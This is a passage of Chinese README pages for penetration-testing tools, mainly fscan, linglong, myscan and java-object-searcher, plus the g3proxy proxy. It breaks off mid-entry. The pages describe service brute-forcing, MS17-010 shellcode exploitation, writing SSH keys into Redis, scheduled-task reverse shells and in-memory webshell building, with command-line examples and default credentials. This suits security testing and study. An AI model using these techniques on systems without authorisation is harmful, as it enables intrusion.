![Version](https://img.shields.io/badge/Version-V2.0.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20210422-green) 8 | 9 | 10 | # 0x00 新增功能 11 | 12 | 1、UI/UX 优化 13 | 14 | 2、增加修改-f -o参数,-f支持txt/csv/json,输出格式优化 15 | 16 | 3、增加端口指纹识别功能。 17 | 18 | 4、增加本地信息搜集模块,增加本地域控探测模块,增加本地Minidump模块 19 | 20 | 5、增加Telnet、VNC、Elasticsearch、RabbitMQ、Kafka、ActiveMQ、LDAP、SMTP、IMAP、POP3、SNMP、Zabbix、Modbus、Rsync、Cassandra、Neo4j扫描。 21 | 22 | 6、架构重构,以反射+插件模块构建 23 | 24 | 7、增加-log参数,支持INFO,SUCCESS、ERROR、DEBUG参数,用于调试具体信息。 25 | 26 | 8、优化线程,现在会以更好的多线程运行 27 | 28 | 29 | 30 | **新版由于对旧版代码进行了全面的重构,难免会有Bug,请在遇到Bug时提交Issue,会尽快修复处理,感谢。** 31 | 32 | **欢迎提交新的插件模块,目前插件为快速热插拔形式,适用于简易开发。** 33 | 34 | # 0x01 简介 35 | 36 | 一款功能丰富的内网综合扫描工具,提供一键自动化、全方位的漏洞扫描能力。 37 | 38 | ## 主要功能 39 | 40 | - 主机存活探测:快速识别内网中的活跃主机 41 | - 端口扫描:全面检测目标主机开放端口 42 | - 服务爆破:支持对常见服务进行密码爆破测试 43 | - 漏洞利用:集成MS17-010等高危漏洞检测 44 | - Redis利用:支持批量写入公钥进行权限获取 45 | - 系统信息收集:可读取Windows网卡信息 46 | - Web应用检测: 47 | - Web指纹识别 48 | - Web漏洞扫描 49 | - 域环境探测: 50 | - NetBIOS信息获取 51 | - 域控制器识别 52 | - 后渗透功能:支持通过计划任务实现反弹shell 53 | 54 | # 0x02 主要功能 55 | ## 1. 信息搜集 56 | - 基于ICMP的主机存活探测:快速识别网络中的活跃主机设备 57 | - 全面的端口扫描:系统地检测目标主机的开放端口情况 58 | 59 | ## 2. 爆破功能 60 | - 常用服务密码爆破:支持SSH、SMB、RDP等多种协议的身份认证测试 61 | - 数据库密码爆破:覆盖MySQL、MSSQL、Redis、PostgreSQL、Oracle等主流数据库系统 62 | 63 | ## 3. 系统信息与漏洞扫描 64 | - 网络信息收集:包括NetBIOS探测和域控制器识别 65 | - 系统信息获取:能够读取目标系统网卡配置信息 66 | - 安全漏洞检测:支持MS17-010等高危漏洞的识别与检测 67 | 68 | ## 4. Web应用探测 69 | - 网站信息收集:自动获取网站标题信息 70 | - Web指纹识别:可识别常见CMS系统与OA框架 71 | - 漏洞扫描能力:集成WebLogic、Struts2等漏洞检测,兼容XRay POC 72 | 73 | ## 5. 漏洞利用模块 74 | - Redis利用:支持写入公钥或植入计划任务 75 | - SSH远程执行:提供SSH命令执行功能 76 | - MS17-010利用:支持ShellCode注入,可实现添加用户等操作 77 | 78 | ## 6. 辅助功能 79 | - 扫描结果存储:将所有检测结果保存至文件,便于后续分析 80 | 81 | # 0x03 使用说明 82 | 83 | ## 基础扫描配置 84 | 85 | **以下参数由于重构原因并不能保证每一个参数都可以正常运行,出现问题请及时提交Issue。** 86 | 87 | **目标配置** 88 | 89 | ``` 90 | -h 指定目标(支持格式:192.168.1.1/24, 192.168.1.1-255, 192.168.1.1,192.168.1.2) 91 | -eh 排除特定目标 92 | -hf 从文件导入目标 93 | ``` 94 | 95 | **端口配置** 96 | ``` 97 | -p 指定端口范围(默认常用端口),如: -p 22,80,3306 或 -p 1-65535 98 | -portf 从文件导入端口列表 99 | ``` 100 | 101 | ## 认证配置 102 | 103 | **用户名密码** 104 | ``` 105 | -user 指定用户名 106 | -pwd 指定密码 107 | -userf 用户名字典文件 108 | -pwdf 密码字典文件 109 | -usera 添加额外用户名 110 | -pwda 添加额外密码 111 | -domain 指定域名 112 | ``` 113 | 114 | **SSH相关** 115 | ``` 116 | -sshkey SSH私钥路径 117 | -c SSH连接后执行的命令 118 | ``` 119 | 120 | ## 扫描控制 121 | 122 | **扫描模式** 123 | ``` 124 | -m 指定扫描模式(默认为All) 125 | -t 线程数(默认60) 126 | -time 超时时间(默认3秒) 127 | -top 存活检测结果展示数量(默认10) 128 | -np 跳过存活检测 129 | -ping 使用ping代替ICMP 130 | -skip 跳过指纹识别 131 | ``` 132 | 133 | ## Web扫描配置 134 | 135 | ``` 136 | -u 指定单个URL扫描 137 | -uf 从文件导入URL列表 138 | -cookie 设置Cookie 139 | -wt Web请求超时时间(默认5秒) 140 | ``` 141 | 142 | ## 代理设置 143 | 144 | ``` 145 | -proxy HTTP代理(如: http://127.0.0.1:8080) 146 | -socks5 SOCKS5代理(如: 127.0.0.1:1080) 147 | ``` 148 | 149 | ## POC扫描配置 150 | 151 | ``` 152 | -pocpath POC文件路径 153 | -pocname 指定POC名称 154 | -full 启用完整POC扫描 155 | -dns 启用DNS日志 156 | -num POC并发数(默认20) 157 | ``` 158 | 159 | ## Redis利用配置 160 | 161 | ``` 162 | -rf Redis文件名 163 | -rs Redis Shell配置 164 | -noredis 禁用Redis检测 165 | ``` 166 | 167 | ## 输出控制 168 | 169 | ``` 170 | -o 输出文件路径(默认关闭) 171 | -f 输出格式(默认txt) 172 | -no 禁用结果保存 173 | -silent 静默模式 174 | -nocolor 禁用彩色输出 175 | -json JSON格式输出 176 | -log 日志级别设置 177 | -pg 显示扫描进度条 178 | ``` 179 | 180 | ## 其他配置 181 | 182 | ``` 183 | -local 本地模式 184 | -nobr 禁用暴力破解 185 | -retry 最大重试次数(默认3次) 186 | -path 远程路径配置 187 | -hash 哈希值 188 | -hashf 哈希文件 189 | -sc Shellcode配置 190 | -wmi 启用WMI 191 | -lang 语言设置(默认zh) 192 | ``` 193 | 194 | **以上参数由于重构原因并不能保证每一个参数都可以正常运行,出现问题请及时提交Issue。** 195 | 196 | ## 编译说明 197 | 198 | ```bash 199 | # 基础编译 200 | go build -ldflags="-s -w" -trimpath main.go 201 | 202 | # UPX压缩(可选) 203 | upx -9 fscan 204 | ``` 205 | 206 | ## 系统安装 207 | ```bash 208 | # Arch Linux 209 | yay -S fscan-git 210 | # 或 211 | paru -S fscan-git 212 | ``` 213 | 214 | # 0x04 运行截图 215 | 216 | `fscan.exe -h 192.168.x.x (全功能、ms17010、读取网卡信息)` 217 | ![](https://github.com/shadow1ng/fscan/raw/main/image/1.png) 218 | 219 | ![](https://github.com/shadow1ng/fscan/raw/main/image/4.png) 220 | 221 | `fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)` 222 | ![](https://github.com/shadow1ng/fscan/raw/main/image/2.png) 223 | 224 | `fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)` 225 | ![](https://github.com/shadow1ng/fscan/raw/main/image/3.png) 226 | 227 | `fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc` 228 | ![](https://github.com/shadow1ng/fscan/raw/main/image/2020-12-12-13-34-44.png) 229 | 230 | `fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)` 231 | ![](https://github.com/shadow1ng/fscan/raw/main/image/netbios.png) 232 | 233 | `go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)` 234 | ![](https://github.com/shadow1ng/fscan/raw/main/image/netbios1.png) 235 | 236 | `go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)` 237 | ![img.png](https://github.com/shadow1ng/fscan/raw/main/image/live.png) 238 | 239 | 新的展示 240 | 241 | ![2.0-1](https://github.com/shadow1ng/fscan/raw/main/image/2.0-1.png) 242 | 243 | ![2.0-2](https://github.com/shadow1ng/fscan/raw/main/image/2.0-2.png) 244 | 245 | 246 | ## 项目相关 247 | 248 | - 2022-12-09 发布演示视频[404星链计划开源安全工具演示——fscan](https://www.bilibili.com/video/BV1Cv4y1R72M/) 249 | 250 | ## 最近更新 251 | 252 | #### [v2.0.0] - 2024-12-19 253 | 254 | **更新** 255 | - 全面代码重构,项目结构重构,插件逻辑优化,项目文档添加,规范化输出、新增本地敏感信息搜集插件等 256 | 257 | #### [v1.8.4] - 2024-05-11 258 | 259 | **更新** 260 | * 优化报错处理,避免部分扫描模块报错后导致的程序退出 261 | * linux(amd64)默认使用fscan 262 | * windows(x64)默认使用fscan.exe 263 | 264 | #### [v1.8.2] - 2022-11-19 265 | 266 | **更新** 267 | - 新增 hash 碰撞 268 | - 新增 wmiiexec 无回显命令执行 269 | 270 | #### [v1.8.1] - 2022-07-06 271 | 272 | **更新** 273 | - 加入手工gc回收,尝试节省无用内存 274 | - -url 支持逗号隔开 275 | - 修复一个poc模块bug 276 | 277 | #### [v1.8.0] - 2022-07-02 278 | 279 | **更新** 280 | - 加强poc fuzz模块,支持跑备份文件、目录、shiro-key等 281 | - 新增ms17017利用,可在ms17010-exp.go自定义shellcode,内置添加用户等功能 282 | - 新增poc、指纹 283 | - 支持socks5代理 284 | - 因body指纹更全,默认不再跑ico图标 285 | 286 | 287 | -------------------------------------------------------------------------------- /detail/g3proxy.md: -------------------------------------------------------------------------------- 1 | ## g3proxy 2 | 3 | ![Language](https://img.shields.io/badge/Language-Rust-blue) 4 | ![Author](https://img.shields.io/badge/Author-bytedance-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/bytedance/g3.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.10.4-red) 7 | ![Time](https://img.shields.io/badge/Join-20250401-green) 8 | 9 | 10 | # G3 Project 11 | 12 | [![minimum rustc: 1.86](https://img.shields.io/badge/minimum%20rustc-1.86-green?logo=rust)](https://www.whatrustisit.com) 13 | [![License: Apache 2.0](https://img.shields.io/badge/license-Apache_2.0-blue.svg)](LICENSE) 14 | [![codecov](https://codecov.io/gh/bytedance/g3/graph/badge.svg?token=TSQCA4ALQM)](https://codecov.io/gh/bytedance/g3) 15 | [![docs](https://readthedocs.org/projects/g3-project/badge)](https://g3-project.readthedocs.io/) 16 | 17 | ## 关于 18 | 19 | 本项目用于构建面向企业的通用代理解决方案,包括但不限于代理、反向代理(开发中)、负载均衡(待定)、NAT穿透(待定)等。 20 | 21 | ## 应用程序 22 | 23 | G3项目包含许多应用,每一个应用程序单独一个子目录,包含各自的代码、文档等。 24 | 25 | 除了应用程序目录,还有一些公共目录: 26 | 27 | - [doc](https://github.com/bytedance/g3/blob/master/doc) 包含项目级别文档。 28 | - [sphinx](https://github.com/bytedance/g3/blob/master/sphinx) 用于为各应用生成HTML参考文档。 29 | - [scripts](https://github.com/bytedance/g3/blob/master/scripts) 包含各种辅助脚本,包括覆盖率测试、打包脚本等。 30 | 31 | ### g3proxy 32 | 33 | 通用正向代理解决方案,同时带有TCP映射、TLS卸载/封装、透明代理、简单反向代理等功能。 34 | 35 | #### 主要特性 36 | 37 | - Async Rust: 高效、稳定 38 | - Http1 / Socks5 正向代理协议, SNI Proxy and TCP TPROXY 39 | - 代理串联,动态下一级代理节点选择 40 | - 丰富的出口路由选择方法,支持接入自定义选路Agent 41 | - TCP/TLS反向代理,基础HTTP反向代理 42 | - TLS支持OpenSSL / BoringSSL / AWS-LC / Tongsuo, 部分场景支持rustls 43 | - TLS中间人劫持, 解密流量导出, HTTP1/HTTP2/IMAP/SMTP协议解析 44 | - ICAP审计,支持HTTP1/HTTP2/IMAP/SMTP,无缝集成第三方安全审计/杀毒产品 45 | - 优雅重载 & 热升级 46 | - 灵活的负载均衡&容灾策略 47 | - 用户认证,且支持丰富的配置选项 48 | - 用户配置下可细化进行差异化站点配置 49 | - 丰富的ACL/限流限速策略,包括入口/出口/用户维度 50 | - 丰富的监控指标,包括入口/出口/用户/用户站点维度 51 | - 多种日志 & 监控解决方案集成能力 52 | 53 | 详细功能介绍及用户指南请看 [g3proxy](https://github.com/bytedance/g3/blob/master/g3proxy/README.md)。 54 | 55 | 可在 [Read the Docs](https://g3-project.readthedocs.io/projects/g3proxy/en/latest/) 线上查看使用sphinx生成的g3proxy参考文档, 56 | 包括详细配置格式、日志格式、监控打点定义、协议定义等。 57 | 58 | ### g3tiles 59 | 60 | 通用反向代理解决方案,开发中。 61 | 62 | 可在 [Read the Docs](https://g3-project.readthedocs.io/projects/g3tiles/en/latest/) 线上查看使用sphinx生成的g3tiles参考文档, 63 | 包括详细配置格式、日志格式、监控打点定义等。 64 | 65 | ### g3bench 66 | 67 | 压测工具,支持 HTTP/1.x、HTTP/2、HTTP/3、TLS握手、DNS、Cloudflare Keyless 。 68 | 69 | 更多详情参考 [g3bench](https://github.com/bytedance/g3/blob/master/g3bench/README.md)。 70 | 71 | ### g3mkcert 72 | 73 | 用来生成 根CA / 中间CA / TLS服务端证书 / TLS客户端证书 的工具。 74 | 75 | ### g3fcgen 76 | 77 | 适用于g3proxy TLS劫持功能的伪造证书生成服务应用。 78 | 79 | ### g3iploc 80 | 81 | 适用于g3proxy GeoIP功能的IP Location查找服务应用。 82 | 83 | ### g3keymess 84 | 85 | Cloudflare Keyless Server的简单实现。 86 | 87 | ## 支持平台 88 | 89 | 目前仅提供对Linux系统的完整支持,其他系统如FreeBSD、NetBSD、macOS、Windows可以编译,但是未测试过功能。 90 | 91 | 如果需要支持其他系统,欢迎提交PR。 92 | 93 | ## 开发环境搭建 94 | 95 | 参考 [Dev-Setup](https://github.com/bytedance/g3/blob/master/doc/dev-setup.md)。 96 | 97 | ## 标准及约定 98 | 99 | 参考 [Standards](https://github.com/bytedance/g3/blob/master/doc/standards.md)。 100 | 101 | ## 发布及打包 102 | 103 | 每个应用程序的每个发布版本都会有对应的tag,格式为 *\-v\* 。 104 | 使用对应的tag生成源码tar包,该tar包可以用于生成deb、rpm等发行版原生包文件。 105 | 106 | 如果需要对正式发布的版本打包: 107 | 108 | 1. 生成版本发布包 109 | 110 | ```shell 111 | ./scripts/release/build_tarball.sh -v 112 | ``` 113 | 114 | 所有引用第三方源码都会放在tar包的vendor目录下,打包时只需要在目标机器上安装好编译器及系统依赖库即可,无需额外的网络连接。 115 | 116 | 2. 打包指令 117 | 118 | deb包: 119 | ```shell 120 | tar xf -.tar.xz 121 | cd - 122 | ./build_deb_from_tar.sh 123 | ``` 124 | 125 | rpm包: 126 | ```shell 127 | rpmbuild -ta ./-.tar.xz 128 | # 如果失败,可以手动执行以下指令: 129 | tar xvf -.tar.xz ./-/.spec 130 | cp -.tar.xz ~/rpmbuild/SOURCES/ 131 | rpmbuild -ba ./-/.spec 132 | ``` 133 | 134 | 如果需要直接从git打包: 135 | 136 | - deb包: 137 | 138 | ```shell 139 | ./build_deb_from_git.sh 140 | ``` 141 | 142 | - rpm包: 143 | 144 | ```shell 145 | ./build_rpm_from_git.sh 146 | ``` 147 | 148 | ### 预构建安装包 149 | 150 | 如需在生产环境使用,建议自行打包。 151 | 152 | 测试环境的话,部分包已经编译上传到 153 | [cloudsmith](https://cloudsmith.io/~g3-oqh/repos/), 可参考该链接页面的说明进行安装。 154 | 155 | ### 制作Docker镜像 156 | 157 | 每个应用的*docker*文件夹下有可参考的Dockerfile(s),命令如下: 158 | 159 | ```shell 160 | # 在源码根目录可执行 161 | docker build -f /docker/debian.Dockerfile . -t : 162 | # 本地没有源码时,可用远程URL执行 163 | docker build -f /docker/debian.Dockerfile github.com/bytedance/g3 -t : 164 | # 如果已经制作了源码tar包,也可以把URL路径换成源码tar包路径 165 | ``` 166 | 167 | ### 静态链接 168 | 169 | 参考 [Static Linking](https://github.com/bytedance/g3/blob/master/doc/static-linking.md)。 170 | 171 | ### 使用OpenSSL变种编译 172 | 173 | 参考 [OpenSSL Variants](https://github.com/bytedance/g3/blob/master/doc/openssl-variants.md)。 174 | 175 | ### 长期支持版本 176 | 177 | 参考 [Long-Term Support](https://github.com/bytedance/g3/blob/master/doc/long-term_support.md). 178 | 179 | ## 贡献指南 180 | 181 | 参考 [Contributing](https://github.com/bytedance/g3/blob/master/CONTRIBUTING.md)。 182 | 183 | 184 | 185 | 186 | ## 项目相关 187 | 188 | 189 | ## 最近更新 190 | 191 | 192 | -------------------------------------------------------------------------------- /detail/java-object-searcher.md: -------------------------------------------------------------------------------- 1 | ## java-object-searcher 2 | 3 | ![Language](https://img.shields.io/badge/Language-Java-blue) 4 | ![Author](https://img.shields.io/badge/Author-c0ny1-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/c0ny1/java-object-searcher.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.1.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20201120-green) 8 | 9 | 10 | 11 | ## 0x01 工具简介 12 | 13 | ``` 14 | ############################################################# 15 | Java Object Searcher v0.01 16 | author: c0ny1 17 | github: http://github.com/c0ny1/java-object-searcher 18 | ############################################################# 19 | ``` 20 | 21 | 配合IDEA在Java应用运行时,对内存中的对象进行搜索。比如可以可以用挖掘request对象用于回显,辅助构造java内存webshell等场景。 22 | 23 | ## 0x02 知识储备 24 | 25 | 使用之前必须了解的三个概念 26 | 27 | #### 2.1 搜索器 28 | 根据要搜索什么样的对象,选择对应的搜索器,目前项目有三类。 29 | 30 | * JavaObjectSearcher 普通搜索器 31 | * SearchRequstByBFS 通过广度优先搜索requst对象搜索器 32 | * SearchRequstByRecursive 通过深度优先搜索requst对象搜索器(递归实现) 33 | 34 | #### 2.2 关键字 & 黑名单 35 | 36 | 关键字是搜索目标对象的关键,可以目标三个属性`属性名`(field_name),`属性值`(field_value)和`属性类型`(field_type)。 37 | 38 | 比如想搜索属性名为table同时属性值为test的对象,还搜索属性名`request`同时属性类型包含`RequestInfo`关键字的,对应的逻辑表达试如下: 39 | 40 | ```$xslt 41 | (field_name = table & field_value = test) || (field_name = request & field_type = RequestInfo) 42 | ``` 43 | 44 | 编写代码如下: 45 | 46 | ```java 47 | List keys = new ArrayList<>(); 48 | keys.add(new Keyword.Builder().setField_name("table").setField_type("test").build()); 49 | keys.add(new Keyword.Builder().setField_name("request").setField_type("RequestInfo").build()); 50 | ``` 51 | 52 | 黑名单是定义哪些属性中不可能存有要搜索的目标对象,防止无意义的搜索,浪费时间。如果把上面的例子当做黑名单,编写的代码也是类似的。 53 | 54 | ```java 55 | List blacklists = new ArrayList<>(); 56 | blacklists.add(new Blacklist.Builder().setField_name("table").setField_value("test").build()); 57 | blacklists.add(new Blacklist.Builder().setField_name("request").setField_type("RequestInfo").build()); 58 | ``` 59 | 60 | ## 0x03 使用步骤 61 | 62 | **1. 将`java-object-searcher-.jar`引入到目标应用的classpath中,或者可以放在jdk的ext目录(一劳永逸)** 63 | 64 | **2. 编写调用代码搜索目标对象** 65 | 66 | 以搜索request对象为例,选好搜索器,并根据要搜索的目标特点构造好关键字(必须)和黑名单(非必须),可写如下搜索代码到IDEA的`Evaluate`中执行。 67 | 68 | ```java 69 | //设置搜索类型包含Request关键字的对象 70 | List keys = new ArrayList<>(); 71 | keys.add(new Keyword.Builder().setField_type("Request").build()); 72 | //定义黑名单 73 | List blacklists = new ArrayList<>(); 74 | blacklists.add(new Blacklist.Builder().setField_type("java.io.File").build()); 75 | //新建一个广度优先搜索Thread.currentThread()的搜索器 76 | SearchRequstByBFS searcher = new SearchRequstByBFS(Thread.currentThread(),keys); 77 | // 设置黑名单 78 | searcher.setBlacklists(blacklists); 79 | //打开调试模式,会生成log日志 80 | searcher.setIs_debug(true); 81 | //挖掘深度为20 82 | searcher.setMax_search_depth(20); 83 | //设置报告保存位置 84 | searcher.setReport_save_path("D:\\apache-tomcat-7.0.94\\bin"); 85 | searcher.searchObject(); 86 | ``` 87 | 88 | ## 0x04 更多 89 | * [半自动化挖掘request实现多种中间件回显](http://gv7.me/articles/2020/semi-automatic-mining-request-implements-multiple-middleware-echo/) 90 | 91 | 92 | ## 项目相关 93 | 94 | 95 | ## 最近更新 96 | 97 | 98 | -------------------------------------------------------------------------------- /detail/linglong.md: -------------------------------------------------------------------------------- 1 | ## linglong 2 | 3 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 4 | ![Author](https://img.shields.io/badge/Author-awake1t-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/awake1t/linglong.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.0.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20210323-green) 8 | 9 | 10 | 11 | 一款资产巡航扫描系统。系统定位是通过masscan+nmap无限循环去发现新增资产,自动进行端口弱口令爆破/、指纹识别、XrayPoc扫描。主要功能包括: `资产探测`、`端口爆破`、`Poc扫描`、`指纹识别`、`定时任务`、`管理后台识别`、`报表展示`。 使用场景是Docker搭建好之后,设置好你要扫描的网段跟爆破任务。就不要管他了,没事过来收漏洞就行了 12 | 13 | ### 功能清单 14 | 15 | - [x] masscan+namp巡航扫描资产 16 | - [x] 创建定时爆破任务(FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD) 17 | - [x] 管理后台识别 18 | - [x] 结果导出 19 | - [x] 报表展示 20 | - [x] docker一键部署 [21-02-08] 21 | - [x] CMS识别 - 结合威胁情报、如果某个CMS爆出漏洞,可以快速定位企业内部有多少资产 [21-02-20] 22 | - [x] poc扫描 - 调用xray的Poc,对新发现的资产自动扫描poc [21-02-20] 23 | 24 | ## 预览 25 | tip:如果图片加载不出来,[点我去gitee看图片](https://gitee.com/awake1t/linglong) 26 | 27 | **首页** 28 | ![image](https://github.com/awake1t/linglong/raw/master/img/index.gif) 29 | 30 | **资产列表** 31 | ![image](https://gitee.com/awake1t/linglong/raw/master/img/ip.png) 32 | 33 | **敏感后台** 34 | ![image](https://gitee.com/awake1t/linglong/raw/master/img/login.png) 35 | 36 | **指纹管理** 37 | ![image](https://github.com/awake1t/linglong/raw/master/img/finger.gif) 38 | 39 | **任务列表** 40 | ![image](https://github.com/awake1t/linglong/raw/master/img/task.gif) 41 | 42 | **任务详情** 43 | ![image](https://gitee.com/awake1t/linglong/raw/master/img/task-de.png) 44 | 45 | **xray** 46 | ![image](https://gitee.com/awake1t/linglong/raw/master/img/xray.png) 47 | ![image](https://gitee.com/awake1t/linglong/raw/master/img/xray-poc.png) 48 | 49 | **设置** 50 | ![image](https://github.com/awake1t/linglong/raw/master/img/setting.gif) 51 | 52 | **管理后台识别** 53 | 54 | 不论甲方乙方。大家在渗透一个网站的时候,很多时候都想尽快找到后台地址。linglong对自己的资产库进行Title识别。然后根据title关键字、url关键字、body关键字(比如url中包含login、body中包含username/password)进行简单区分后台。帮助我们渗透中尽快锁定后台。 55 | 56 | **指纹识别** 57 | 58 | 系统会对新发现的资产进行一遍指纹识别, 也可以手动新增指纹。比如某个CMS爆出漏洞,新增指纹扫描一遍系统中存在的资产。可以快速定位到漏洞资产,对于渗透打点或者甲方应急都是极好的 59 | 60 | **POC扫描** 61 | 62 | 对于任何一个扫描系统,poc扫描都是必不可少的。但是poc的更新一直是所有开源项目面临的一个问题。综合考虑用Xray的poc,系统集成的XRAY版本是1.7.0,感谢Xray对安全圈做出的贡献! linglong会对每次新发现的资产进行一遍Xray的Poc扫描。如果发现漏洞会自动入库,可以可视化查看漏洞结果 63 | 64 | **资产巡航更新** 65 | 66 | masscan可以无限扫描,但是对于失效资产我们也不能一直保存。linglong通过动态设置资产扫描周期,对于N个扫描周期都没有扫描到的资产会进行删除。保存资产的时效性 67 | 68 | 69 | ## 安装 70 | 71 | ### Docker安装 72 | 73 | #### 如果部署在本地体验(本地机器或者自己的虚拟机) 74 | 75 | 如果是**本地体验**下,直接运行如下命令 76 | 77 | ```bash 78 | git clone https://github.com/awake1t/linglong 79 | cd linglong 80 | docker-compose up -d 81 | ``` 82 | 83 | 运行结束后,运行`docker container ls -a`看下是否运行正常 84 | 85 | ![image](https://github.com/awake1t/linglong/raw/master/img/docker.png) 86 | 87 | web访问 http://ip:8001 88 | 登录账号:linglong 89 | 登录密码:linglong5s 90 | 91 | 92 | | Web账号 | linglong | linglong5s | 93 | | ----------- | -------- | ---------- | 94 | | 类型 | 用户名 | 密码 | 95 | | mysql数据库 | root | linglong8s | 96 | 97 | ### 注: 首次运行在设置里修改扫描的网段范围,点击保存后就行了。然后耐心等待系统自动扫描,扫描耗时您配置的网段+端口+速率会有变化 98 | 99 | 100 | 101 | 102 | #### 如果部署在服务器上(地址不是127.0.0.1情况) 103 | 104 | ```bash 105 | git clone https://github.com/awake1t/linglong 106 | cd linglong/web 107 | 108 | # 把 YourServerIp 换成你的IP地址 109 | sed -i 's#http://127.0.0.1:18000#http://YourServerIp:18000#g' ./dist/js/app.4dccb236.js && sed -i 's#http://127.0.0.1:18000#http://YourServerIp:18000#g' ./dist/js/app.4dccb236.js.map 110 | 111 | 112 | # 重要!!! 如果之前安装过,使用如下命令删除所有名字包含linglong的历史镜像 113 | docker rmi $(docker images | grep "linglong" | awk '{print $3}') 114 | 115 | 116 | # 返回到 linglong的目录下 117 | cd ../ 118 | docker-compose up -d 119 | 120 | 一般这时候就部署好了,如果访问不了. 要确认下服务器上安全组的8001和18000有没有打开. 121 | ``` 122 | ![image](https://github.com/awake1t/linglong/raw/master/img/docker2.png) 123 | 124 | 125 | ## 项目相关 126 | 127 | 128 | ## 最近更新 129 | 130 | 131 | -------------------------------------------------------------------------------- /detail/myscan.md: -------------------------------------------------------------------------------- 1 | ## myscan 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-amcai-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/amcai/myscan.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.0.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20201120-green) 8 | 9 | 10 | 11 | myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc,由python3开发而成的被动扫描工具。 12 | 此项目源自个人开发项目,结合个人对web渗透,常见漏洞原理和检测的代码实现,通用poc的搜集,被动扫描器设计,以及信息搜集等思考实践。 13 | 14 | ## 法律免责声明 15 | 16 | 未经事先双方同意,使用myscan攻击目标是非法的。 17 | myscan仅用于安全测试目的 18 | 19 | ## 运行原理 20 | myscan依赖burpsuite和redis,需启动redis和burpsuite插入myscan的插件。 21 | 22 | 依靠burp强大的抓包和解析数据包的功能,插件调取api把burp的请求体和响应体的处理数据整合成json数据传输到redis。 23 | 24 | myscan调取redis数据,对每一个request/response数据包进行perfile(访问url)、perfolder(每一个目录)、perscheme(每一个数据包)分类去重,通过redis分发到各个子进程与运行相应的poc。 25 | 26 | ![流程图](https://github.com/amcai/myscan/raw/master/docs/images/%E6%B5%81%E7%A8%8B%E5%9B%BE.png) 27 | 28 | ## 演示地址 29 | 30 | [myscan演示视频](https://www.bilibili.com/video/BV1tV411f7p6/) 31 | 32 | ## 如何运行 33 | 34 | 平台要求: 35 | 36 | 不支持Windows,目前仅支持Linux(Windows python多进程不会把变量共享过去) 37 | 38 | 软件要求: 39 | 40 | python > 3.7.5 , redis-server ,(开发基于3.7.5,建议使用此版本,某些版本会出问题) 41 | 42 | ```bash 43 | $ redis-server # 起一个redis服务,默认监听127.1:6379 44 | $ pip3 install -r requirements.txt 安装依赖 45 | $ # burpsuite安转扩展插件,默认连接127.1:6379 46 | $ python3 cli.py -h 47 | ``` 48 | 49 | Example: 50 | 51 | 建议大批量测试时候禁用未授权,baseline,cors,jsonp等插件,指定输出: 52 | 53 | ``` 54 | python3 cli.py webscan --disable power baseline cors jsonp sensitive_msg_transfer host_inject --html-output test.html 55 | ``` 56 | 大批量测试时只测试严重rce的poc,可在--enable筛选出来的的poc上再次通过--level 3,筛选严重等级的poc 57 | ``` 58 | python3 cli.py webscan --enable poc_ struts2 --level 3 59 | ``` 60 | 把redis所有数据清除(即清除当前的所有任务队列),针对指定host,指定redis连接方式,默认输出到myscan_result_{num}.html,启动10个进程,某些poc线程为5 61 | 62 | ``` 63 | python3 cli.py webscan --host 127.0.0.1 192.168 --redis pass@127.0.0.1:6379:0 --clean --process 10 --threads 5 64 | ``` 65 | 启动反连平台(服务器端) 66 | 67 | ``` 68 | python3 cli.py reverse 69 | ``` 70 | 71 | 更多参数 72 | 73 | ``` 74 | python cli.py -h 75 | ``` 76 | 77 | ## 检测插件 78 | 79 | 目录扫描,重定向,XSS,SQL,XXE,CORS,JSONP,CRLF,CmdInject,敏感信息泄漏,Struts2,Thinkphp,Weblogic,Shiro... ,详见pocs目录,可根据数据包的特征,对每个参数进行测试,或者选择性测试,新的检测模块将不断添加。 80 | 81 | ## 优势与不足 82 | 83 | * 支持--ipv6绕过防火墙, 优先解析域名为IPV6,前提是在支持IPV6的网站和网络上。 84 | 85 | * 内置反连平台,支持rmi,ldap,http,dnslog方式,可配置config.py部署在内外网,POC准确率高。 86 | * python代码开源,不会编程难写poc。 87 | * 依靠burp和redis,不用写监听程序和多进程处理数据容易,同时也严重依赖burp。 88 | * 自定义插件,比如把request/response数据包导入到elasticsearch,便于后续查询。 89 | * 通过redis,可分布式检测。 90 | 91 | 92 | ## 项目相关 93 | 94 | 95 | ## 最近更新 96 | 97 | 98 | -------------------------------------------------------------------------------- /detail/passive-scan-client.md: -------------------------------------------------------------------------------- 1 | ## passive-scan-client 2 | 3 | ![Language](https://img.shields.io/badge/Language-Java-blue) 4 | ![Author](https://img.shields.io/badge/Author-c0ny1-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/c0ny1/passive-scan-client.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.3.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20210120-green) 8 | 9 | 10 | 11 | ## Burp被动扫描流量转发插件 12 | 13 | 14 | ### 0x01 插件简介 15 | 16 | ``` 17 | Q1: 将浏览器代理到被动扫描器上,访问网站变慢,甚至有时被封ip,这该怎么办? 18 | Q2: 